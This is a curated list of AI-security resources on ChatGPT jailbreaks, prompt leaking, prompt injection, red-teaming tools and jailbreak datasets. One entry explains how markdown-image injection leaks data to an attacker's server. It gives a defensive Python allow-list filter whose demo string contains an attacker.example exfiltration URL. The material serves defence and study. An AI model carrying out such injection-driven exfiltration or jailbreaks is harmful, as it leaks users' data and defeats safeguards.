

Explore ChatGPT jailbreaks, prompt leaks, injection techniques, and tools focused on LLM security and prompt engineering.

A collection of GPT system prompts, along with notes on prompt injection and prompt leaking.

This paper presents new methods for generating adversarial attacks that transfer across aligned language models. Its findings expose weaknesses that matter for LLM security.

Explores prompt injection attacks on AI tools such as ChatGPT, covering both attack techniques and mitigation strategies.

A blog discussing prompt injection vulnerabilities in large language models (LLMs) and their implications.

Explores security vulnerabilities in ChatGPT plugins, focusing on data exfiltration through markdown injections.
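Markdown-injection exfiltration typically works because a chat interface that renders model output as markdown will fetch any image URL the model emits. Data an attacker has tricked the model into placing in that URL's query string therefore reaches the attacker's server without any user click.

One output-side mitigation is to remove images whose host is not on an allow-list before rendering. The sketch below assumes the output is rendered as markdown and that a fixed set of trusted image hosts is acceptable. The function `strip_untrusted_images` and the example host names are hypothetical. The sketch handles only inline images. It does not cover reference-style images (`![alt][ref]`), raw HTML `<img>` tags, or clickable links.

```python
import re
from urllib.parse import urlparse

# Matches inline markdown images: ![alt](url) or ![alt](url "title"),
# optionally with the URL wrapped in angle brackets.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(text: str, allowed_hosts: set) -> str:
    """Replace markdown images whose URL host is not allow-listed.

    Relative URLs have no host, so they are also removed (conservative).
    """

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = (urlparse(url).hostname or "").lower()
        if host in allowed_hosts:
            return match.group(0)  # trusted host: keep the image unchanged
        # Untrusted host: drop the URL so the renderer never fetches it.
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return MD_IMAGE.sub(_replace, text)


if __name__ == "__main__":
    reply = (
        "Summary ![x](https://attacker.example/log?d=secret) "
        "and ![logo](https://cdn.example.com/logo.png)"
    )
    print(strip_untrusted_images(reply, {"cdn.example.com"}))
```

An allow-list is used instead of a block-list because an attacker controls the injected URL and can register any new domain. Filtering at render time also works no matter how the malicious instruction reached the model.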

A resource for understanding prompt injection vulnerabilities in AI, including techniques and real-world examples.

An open-source tool from AIShield that provides AI model insights and vulnerability scans to help secure the AI supply chain.

A plug-and-play AI red teaming toolkit to simulate adversarial attacks on machine learning models.

A comprehensive security checklist for AI tools built on MCP (Model Context Protocol), aimed at safeguarding LLM plugin ecosystems.

JailBench is a comprehensive Chinese dataset for assessing jailbreak attack risks in large language models.

AIPromptJailbreakPractice is a GitHub repository documenting AI prompt jailbreak practices.